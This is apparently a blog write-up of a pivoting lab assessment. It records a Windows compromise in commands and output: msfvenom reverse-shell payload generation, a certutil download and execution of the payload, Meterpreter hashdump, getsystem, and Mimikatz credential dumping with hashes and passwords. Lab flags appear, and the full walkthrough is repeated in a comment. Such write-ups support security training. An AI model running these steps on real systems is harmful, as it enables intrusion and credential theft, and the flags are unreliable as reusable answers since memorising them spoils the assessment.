Pivot, Tunneling, and Port Forwarding Pivot Skill Assessment part 3 The Final count down

======================================================Bingo

Discovered open port 3389/tcp on 172.16.5.35

=========================================================RDP into the Windows Box

sudo proxychains xfreerdp /v:172.16.5.35 /u:mlefay /p:'Plain Human work!'

Enumerate the internal network and discover another active host. Submit the IP address of that host as the answer.

172.16.5.35

Use the information you gathered to pivot to the discovered host. Submit the contents of C:Flag.txt as the answer.

S1ngl3-Piv07-3@sy-Day

C:Usersmlefay.ssh

==========================================================on 10-28-2023 next make port forwarding rule so any traffic this meterpreter session receives goes to our attackbox

portfowarding issues refer to https://www.offsec.com/metasploit-unleashed/portfwd/

portfwd add -R -l 8081 -p 1234 -L 10.10.16.41

[*] Local TCP relay created: 10.129.201.127:8081 <-> :1234

===========================================================Setup another reverse tcp listener

meterpreter > bg

[*] Backgrounding session 1…

use multi/handler

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp

payload => windows/x64/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set LPORT 8081

LPORT => 8081

msf6 exploit(multi/handler) > set LHOST 0.0.0.0

LHOST => 0.0.0.0

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 0.0.0.0:8081

============================================================Next make your payload

[!bash!]$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.15 -f exe -o backupscript2.exe LPORT=1234

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload

[-] No arch selected, selecting arch: x64 from the payload

No encoder specified, outputting raw payload

Payload size: 510 bytes

Final size of exe file: 7168 bytes

Saved as: backupscript.exe

python3 -m http.server 8000

==========================================================Transfer to ubuntu and after to the windows box

wget http://10.10.16.41:8000/backupscript2.exe

chmod +x backupscript2.exe

=========================================================From the ubuntu box to the windows box

Python Server

python3 -m http.server 8000

==========================================================From RDP session on windows box

Python victim

certutil -urlcache -f http://172.16.5.15:8000/backupscript2.exe backupscript2.exe

make tmp dir

mkdir tmp

./backupscript2.exe

===========================================================you should have a meterpreter connection dump the passwords on attaack box

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 0.0.0.0:8081

[*] Sending stage (200774 bytes) to 10.10.16.41

[*] Meterpreter session 2 opened (10.10.16.41:8081 -> 10.10.16.41:33475) at 2023-10-28 21:15:45 -0400

meterpreter > shell

Process 2336 created.

Channel 1 created.

Microsoft Windows [Version 10.0.17763.1637]

(c) 2018 Microsoft Corporation. All rights reserved.

C:>

meterpreter > whoami

[-] Unknown command: whoami

meterpreter > getuid

Server username: PIVOT-SRV01mlefay

meterpreter > hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:bdaffbfe64f1fc646a3353be1c2c3c99:::

apendragon:1002:aad3b435b51404eeaad3b435b51404ee:222007372da023ed0cdf0a4606bf9b23:::

DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

mlefay:1003:aad3b435b51404eeaad3b435b51404ee:2831bf1e4e0841d882328d5481fb5c92:::

WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:4b4ba140ac0767077aee1958e7f78070:::

meterpreter >

=================================================================Upgrade you privileges

meterpreter > getsystem

…got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

meterpreter > getuid

Server username: NT AUTHORITYSYSTEM

load kiwi

=======================================================================Get creds creds_all

creds_all

https://www.hackers-arise.com/post/2018/11/26/metasploit-basics-part-21-post-exploitation-with-mimikatz========Do you need this? to upgrade to x64 session check

msv credentials

===============

Username Domain NTLM SHA1 DPAPI

——– —— —- —- —–

PIVOT-SRV01$ INLANEFREIGHT 21ce18b1a025d4b0b01c0e716e99d476 0f6097d8c745b1addfdfbbe733c1948e5d929527

mlefay PIVOT-SRV01 2831bf1e4e0841d882328d5481fb5c92 ccb38ae19c47a04fa01542f30466d6c48ddc18d7

vfrank INLANEFREIGHT 2e16a00be74fa0bf862b4256d0347e83 b055c7614a5520ea0fc1184ac02c88096e447e0b 97ead6d940822b2c57b18885ffcc5fb4

wdigest credentials

===================

Username Domain Password

——– —— ——–

(null) (null) (null)

PIVOT-SRV01$ INLANEFREIGHT (null)

mlefay PIVOT-SRV01 (null)

vfrank INLANEFREIGHT (null)

kerberos credentials

====================

Username Domain Password

——– —— ——–

(null) (null) (null)

PIVOT-SRV01$ INLANEFREIGHT.LOCAL z4PN$Qc?h1n'mI`r<dzJ:-S?dbm.tA:ANPnGG]1h8,Gb[#Gx`SJj3DOBCwhJW^LMUKkPQb!(P9<$VDLWL+UL4KDZ&lh^Z_[OEj;Is4= 1GOR+3h<U/a[Q

7#

mlefay PIVOT-SRV01 (null)

pivot-srv01$ INLANEFREIGHT.LOCAL z4PN$Qc?h1n'mI`r<dzJ:-S?dbm.tA:ANPnGG]1h8,Gb[#Gx`SJj3DOBCwhJW^LMUKkPQb!(P9<$VDLWL+UL4KDZ&lh^Z_[OEj;Is4= 1GOR+3h<U/a[Q

7#

vfrank INLANEFREIGHT.LOCAL Imply wet Unmasked!

==================================From RDP session we noticed that Server01 has access to another network doing ipconfig

PS C:tmp> arp -a

Interface: 172.16.5.35 — 0x4

Internet Address Physical Address Type

172.16.5.15 00-50-56-b9-90-70 dynamic

172.16.255.255 ff-ff-ff-ff-ff-ff static

224.0.0.22 01-00-5e-00-00-16 static

224.0.0.251 01-00-5e-00-00-fb static

224.0.0.252 01-00-5e-00-00-fc static

Interface: 172.16.6.35 — 0x5

Internet Address Physical Address Type

172.16.255.255 ff-ff-ff-ff-ff-ff static

224.0.0.22 01-00-5e-00-00-16 static

224.0.0.251 01-00-5e-00-00-fb static

224.0.0.252 01-00-5e-00-00-fc static

PS C:tmp> ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0:

Connection-specific DNS Suffix . :

Link-local IPv6 Address . . . . . : fe80::cd4d:c90e:a5c:8122%4

IPv4 Address. . . . . . . . . . . : 172.16.5.35

Subnet Mask . . . . . . . . . . . : 255.255.0.0

Default Gateway . . . . . . . . . : 172.16.5.1

Ethernet adapter Ethernet1 2:

Connection-specific DNS Suffix . :

Link-local IPv6 Address . . . . . : fe80::1cac:883e:2e2f:4d3c%5

IPv4 Address. . . . . . . . . . . : 172.16.6.35

Subnet Mask . . . . . . . . . . . : 255.255.0.0

Default Gateway . . . . . . . . . :

PS C:tmp>

========================Do ping scan with powershell

1..254 | % {"172.16.6.$($_): $(Test-Connection -count 1 -comp 172.15.6.$($_) -quiet)"}

===============Per some blog I found that the last box is 172.16.6.25

PS C:Windowssystem32> ping 172.16.6.25

Pinging 172.16.6.25 with 32 bytes of data:

Reply from 172.16.5.35: Destination host unreachable.

Reply from 172.16.6.25: bytes=32 time=1ms TTL=128

Reply from 172.16.6.25: bytes=32 time<1ms TTL=128

Reply from 172.16.6.25: bytes=32 time<1ms TTL=128

Ping statistics for 172.16.6.25:

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 0ms, Maximum = 1ms, Average = 0ms

PS C:Windowssystem32>

==================================User mimikatz to get password

try to RDP into 172.16.6.25 with the creds below from the 172.16.5.35 box

user: vfrank , pass: Imply wet Unmasked!

========================================From VFRANK session on 172.16.6.25 RDP session

FIND FLAG ON WINDOW10 BOX

N3tw0rk-H0pp1ng-f0R-FuN

PER ACTIVE DIRECTORY THE DOMAIN CONTROLLER IS ACADEMY-PIVOT-D

PS C:Usersvfrank> nslookup ACADEMY-PIVOT-D

DNS request timed out.

timeout was 2 seconds.

Server: UnKnown

Address: 172.16.10.5

* UnKnown can't find ACADEMY-PIVOT-D: Non-existent domain

PS C:Usersvfrank> ping 172.16.10.5

Pinging 172.16.10.5 with 32 bytes of data:

Reply from 172.16.10.5: bytes=32 time=3ms TTL=128

Reply from 172.16.10.5: bytes=32 time<1ms TTL=128

Reply from 172.16.10.5: bytes=32 time<1ms TTL=128

Ping statistics for 172.16.10.5:

Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 0ms, Maximum = 3ms, Average = 1ms

Control-C

PS C:Usersvfrank> ipconfig

Windows IP Configuration

===========================================RDP session with 172.16.6.25

Flag on DC check mapped drives and click on DC mapped drive

Submit the contents of C:Flag.txt located on the Domain Controller.

3nd-0xf-Th3-R@inbow!

note that the DC is prob ===========================================172.16.10.5 but we found the flag

2 thoughts on “Pivot, Tunneling, and Port Forwarding Pivot Skill Assessment part 3 The Final count down”

Sajal Pandey

October 31, 2023 at 11:22 am

Thanks
Into the Code with Danny

October 31, 2023 at 11:22 am

======================================================Bingo

Discovered open port 3389/tcp on 172.16.5.35

=========================================================RDP into the Windows Box

sudo proxychains xfreerdp /v:172.16.5.35 /u:mlefay /p:'Plain Human work!'

Enumerate the internal network and discover another active host. Submit the IP address of that host as the answer.

172.16.5.35

Use the information you gathered to pivot to the discovered host. Submit the contents of C:Flag.txt as the answer.

S1ngl3-Piv07-3@sy-Day

C:Usersmlefay.ssh

==========================================================on 10-28-2023 next make port forwarding rule so any traffic this meterpreter session receives goes to our attackbox

portfowarding issues refer to https://www.offsec.com/metasploit-unleashed/portfwd/

portfwd add -R -l 8081 -p 1234 -L 10.10.16.41

[*] Local TCP relay created: 10.129.201.127:8081 <-> :1234

===========================================================Setup another reverse tcp listener

meterpreter > bg

[*] Backgrounding session 1…

use multi/handler

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp

payload => windows/x64/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set LPORT 8081

LPORT => 8081

msf6 exploit(multi/handler) > set LHOST 0.0.0.0

LHOST => 0.0.0.0

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 0.0.0.0:8081

============================================================Next make your payload

[!bash!]$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.15 -f exe -o backupscript2.exe LPORT=1234

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload

[-] No arch selected, selecting arch: x64 from the payload

No encoder specified, outputting raw payload

Payload size: 510 bytes

Final size of exe file: 7168 bytes

Saved as: backupscript.exe

python3 -m http.server 8000

==========================================================Transfer to ubuntu and after to the windows box

wget http://10.10.16.41:8000/backupscript2.exe

chmod +x backupscript2.exe

=========================================================From the ubuntu box to the windows box

Python Server

python3 -m http.server 8000

==========================================================From RDP session on windows box

Python victim

certutil -urlcache -f http://172.16.5.15:8000/backupscript2.exe backupscript2.exe

make tmp dir

mkdir tmp

./backupscript2.exe

===========================================================you should have a meterpreter connection dump the passwords on attaack box

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 0.0.0.0:8081

[*] Sending stage (200774 bytes) to 10.10.16.41

[*] Meterpreter session 2 opened (10.10.16.41:8081 -> 10.10.16.41:33475) at 2023-10-28 21:15:45 -0400

meterpreter > shell

Process 2336 created.

Channel 1 created.

Microsoft Windows [Version 10.0.17763.1637]

(c) 2018 Microsoft Corporation. All rights reserved.

C:>

meterpreter > whoami

[-] Unknown command: whoami

meterpreter > getuid

Server username: PIVOT-SRV01mlefay

meterpreter > hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:bdaffbfe64f1fc646a3353be1c2c3c99:::

apendragon:1002:aad3b435b51404eeaad3b435b51404ee:222007372da023ed0cdf0a4606bf9b23:::

DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

mlefay:1003:aad3b435b51404eeaad3b435b51404ee:2831bf1e4e0841d882328d5481fb5c92:::

WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:4b4ba140ac0767077aee1958e7f78070:::

meterpreter >

=================================================================Upgrade you privileges

meterpreter > getsystem

…got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

meterpreter > getuid

Server username: NT AUTHORITYSYSTEM

load kiwi

=======================================================================Get creds creds_all

creds_all

https://www.hackers-arise.com/post/2018/11/26/metasploit-basics-part-21-post-exploitation-with-mimikatz========Do you need this? to upgrade to x64 session check

msv credentials

===============

Username Domain NTLM SHA1 DPAPI

——– —— —- —- —–

PIVOT-SRV01$ INLANEFREIGHT 21ce18b1a025d4b0b01c0e716e99d476 0f6097d8c745b1addfdfbbe733c1948e5d929527

mlefay PIVOT-SRV01 2831bf1e4e0841d882328d5481fb5c92 ccb38ae19c47a04fa01542f30466d6c48ddc18d7

vfrank INLANEFREIGHT 2e16a00be74fa0bf862b4256d0347e83 b055c7614a5520ea0fc1184ac02c88096e447e0b 97ead6d940822b2c57b18885ffcc5fb4

wdigest credentials

===================

Username Domain Password

——– —— ——–

(null) (null) (null)

PIVOT-SRV01$ INLANEFREIGHT (null)

mlefay PIVOT-SRV01 (null)

vfrank INLANEFREIGHT (null)

kerberos credentials

====================

Username Domain Password

——– —— ——–

(null) (null) (null)

PIVOT-SRV01$ INLANEFREIGHT.LOCAL z4PN$Qc?h1n'mI`r<dzJ:-S?dbm.tA:ANPnGG]1h8,Gb[#Gx`SJj3DOBCwhJW^LMUKkPQb!(P9<$VDLWL+UL4KDZ&lh^Z_[OEj;Is4= 1GOR+3h<U/a[Q

7#

mlefay PIVOT-SRV01 (null)

pivot-srv01$ INLANEFREIGHT.LOCAL z4PN$Qc?h1n'mI`r<dzJ:-S?dbm.tA:ANPnGG]1h8,Gb[#Gx`SJj3DOBCwhJW^LMUKkPQb!(P9<$VDLWL+UL4KDZ&lh^Z_[OEj;Is4= 1GOR+3h<U/a[Q

7#

vfrank INLANEFREIGHT.LOCAL Imply wet Unmasked!

==================================From RDP session we noticed that Server01 has access to another network doing ipconfig

PS C:tmp> arp -a

Interface: 172.16.5.35 — 0x4

Internet Address Physical Address Type

172.16.5.15 00-50-56-b9-90-70 dynamic

172.16.255.255 ff-ff-ff-ff-ff-ff static

224.0.0.22 01-00-5e-00-00-16 static

224.0.0.251 01-00-5e-00-00-fb static

224.0.0.252 01-00-5e-00-00-fc static

Interface: 172.16.6.35 — 0x5

Internet Address Physical Address Type

172.16.255.255 ff-ff-ff-ff-ff-ff static

224.0.0.22 01-00-5e-00-00-16 static

224.0.0.251 01-00-5e-00-00-fb static

224.0.0.252 01-00-5e-00-00-fc static

PS C:tmp> ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0:

Connection-specific DNS Suffix . :

Link-local IPv6 Address . . . . . : fe80::cd4d:c90e:a5c:8122%4

IPv4 Address. . . . . . . . . . . : 172.16.5.35

Subnet Mask . . . . . . . . . . . : 255.255.0.0

Default Gateway . . . . . . . . . : 172.16.5.1

Ethernet adapter Ethernet1 2:

Connection-specific DNS Suffix . :

Link-local IPv6 Address . . . . . : fe80::1cac:883e:2e2f:4d3c%5

IPv4 Address. . . . . . . . . . . : 172.16.6.35

Subnet Mask . . . . . . . . . . . : 255.255.0.0

Default Gateway . . . . . . . . . :

PS C:tmp>

========================Do ping scan with powershell

1..254 | % {"172.16.6.$($_): $(Test-Connection -count 1 -comp 172.15.6.$($_) -quiet)"}

===============Per some blog I found that the last box is 172.16.6.25

PS C:Windowssystem32> ping 172.16.6.25

Pinging 172.16.6.25 with 32 bytes of data:

Reply from 172.16.5.35: Destination host unreachable.

Reply from 172.16.6.25: bytes=32 time=1ms TTL=128

Reply from 172.16.6.25: bytes=32 time<1ms TTL=128

Reply from 172.16.6.25: bytes=32 time<1ms TTL=128

Ping statistics for 172.16.6.25:

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 0ms, Maximum = 1ms, Average = 0ms

PS C:Windowssystem32>

==================================User mimikatz to get password

try to RDP into 172.16.6.25 with the creds below from the 172.16.5.35 box

user: vfrank , pass: Imply wet Unmasked!

========================================From VFRANK session on 172.16.6.25 RDP session

FIND FLAG ON WINDOW10 BOX

N3tw0rk-H0pp1ng-f0R-FuN

PER ACTIVE DIRECTORY THE DOMAIN CONTROLLER IS ACADEMY-PIVOT-D

PS C:Usersvfrank> nslookup ACADEMY-PIVOT-D

DNS request timed out.

timeout was 2 seconds.

Server: UnKnown

Address: 172.16.10.5

* UnKnown can't find ACADEMY-PIVOT-D: Non-existent domain

PS C:Usersvfrank> ping 172.16.10.5

Pinging 172.16.10.5 with 32 bytes of data:

Reply from 172.16.10.5: bytes=32 time=3ms TTL=128

Reply from 172.16.10.5: bytes=32 time<1ms TTL=128

Reply from 172.16.10.5: bytes=32 time<1ms TTL=128

Ping statistics for 172.16.10.5:

Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 0ms, Maximum = 3ms, Average = 1ms

Control-C

PS C:Usersvfrank> ipconfig

Windows IP Configuration

===========================================RDP session with 172.16.6.25

Flag on DC check mapped drives and click on DC mapped drive

Submit the contents of C:Flag.txt located on the Domain Controller.

3nd-0xf-Th3-R@inbow!

note that the DC is prob ===========================================172.16.10.5 but we found the flag

Comments are closed.

You May Also Like

déploiement de sage saari sur Windows serveur 2012 R2 quatrième partie

How to Setup Zoho SMTP Server Free

Xe gầm cao MG ZS khuyến mại đầu năm 2024, trả trước chưa đến 100 triệu. Giá xe MG ZS tháng 1/2024.

2 thoughts on “Pivot, Tunneling, and Port Forwarding Pivot Skill Assessment part 3 The Final count down”